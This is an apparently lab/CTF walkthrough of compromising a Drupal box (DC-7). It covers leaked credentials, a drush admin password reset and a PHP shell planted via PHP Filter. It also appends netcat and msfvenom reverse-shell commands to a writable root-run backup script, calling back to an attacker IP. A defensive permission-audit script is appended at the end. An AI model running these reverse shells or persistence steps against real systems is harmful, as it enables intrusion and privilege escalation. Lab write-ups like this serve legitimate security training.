We start by scanning the box with nmap -A -T4 -p- 192.168.1.5 -vv

Actually, if we take a look at the main page there is a username there. I googled it and it took me to a Twitter page, where there is a link to the user's GitHub, which is just a page for this box where we can find some files. Among them there is a file called config.php, and inside it are the username and the password.


User dc7user, password MdR3xOgB7#dW. The username and password didn't work to log in to the Drupal page, but SSH did work.

Inside the home directory there is a file, mbox; viewing it gave the path to another file, /opt/scripts/backups.sh

Viewing the file backups.sh:

Googling how to use drush gave me a way to change the admin password with drush user-password admin --password=admin123

Writing the command in /tmp didn't work, so I had to write it in /var/www/html

Now we can log in to the Drupal page using the new password we gave:

Now we need to upload a shell to the website, but the PHP module is not installed and we need to install it from this webpage:
https://www.drupal.org/project/php/releases/8.x-1.0

Then click on Enable newly added modules

Now go to http://192.168.1.5/admin/modules, scroll down to the middle of the page, activate PHP Filter, and then click Install at the end of the page to activate it.

Now go to the Content section and edit the 404 page, so we can upload a PHP script there

On our machine we get ready with nc -lvp 4444, and as soon as I click the Publish button:

Now back to the backups.sh file located at /opt/scripts. The file is writable and executable, so we can add some sort of shell script inside to make a connection back to our machine:

I tried echo "nc -e /bin/sh 192.168.1.11 443" >> backups.sh but it didn't work, so I tried msfvenom instead:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.11 lport=6666 R

echo "mkfifo /tmp/mjohwp; nc 192.168.1.11 6666 0</tmp/mjohwp | /bin/sh >/tmp/mjohwp 2>&1; rm /tmp/mjohwp" >>backups.sh

Now we wait until the script is run, and we get a shell on our machine with nc -lvp 6666
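
The weak point in this last step is a script that the web server account can modify and that is later run by something else. As an added example (not part of the original write-up), the shell function below checks a script and the directory holding it for that condition. It assumes GNU stat, and the function name and the expected-owner argument are hypothetical.

```shell
#!/bin/sh
# Added example (not from the write-up): report whether a scheduled script,
# or the directory holding it, can be modified by anyone but the expected owner.
# Assumes GNU stat; perm_findings and its arguments are hypothetical names.

# perm_findings PATH [EXPECTED_UID]   (EXPECTED_UID defaults to 0, i.e. root)
# Prints one line per finding. Returns 0 if clean, 1 if findings, 2 on error.
perm_findings() {
    target=$1
    want_uid=${2:-0}
    rc=0
    if [ ! -e "$target" ]; then
        echo "$target: missing, so whoever can create it decides what runs"
        return 1
    fi
    # Write access to the directory allows replacing the file, so check both.
    for p in "$target" "$(dirname "$target")"; do
        info=$(stat -L -c '%a %u %g' "$p") || return 2
        mode=${info%% *}
        rest=${info#* }
        uid=${rest%% *}
        gid=${rest#* }
        other=$((mode % 10))        # last octal digit: permissions for others
        grp=$((mode / 10 % 10))     # digit before it: permissions for group
        if [ "$uid" != "$want_uid" ]; then
            echo "$p: owned by uid $uid, expected uid $want_uid"; rc=1
        fi
        if [ $((grp & 2)) -ne 0 ]; then
            echo "$p: writable by gid $gid (mode $mode)"; rc=1
        fi
        if [ $((other & 2)) -ne 0 ]; then
            echo "$p: world-writable (mode $mode)"; rc=1
        fi
    done
    return $rc
}

# Usage: sh audit.sh /opt/scripts/backups.sh
if [ "$#" -gt 0 ]; then
    for f in "$@"; do perm_findings "$f" || true; done
fi
```

Run it against every path referenced from crontabs and systemd timers; any finding means an account other than the intended owner can change what the scheduler executes.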
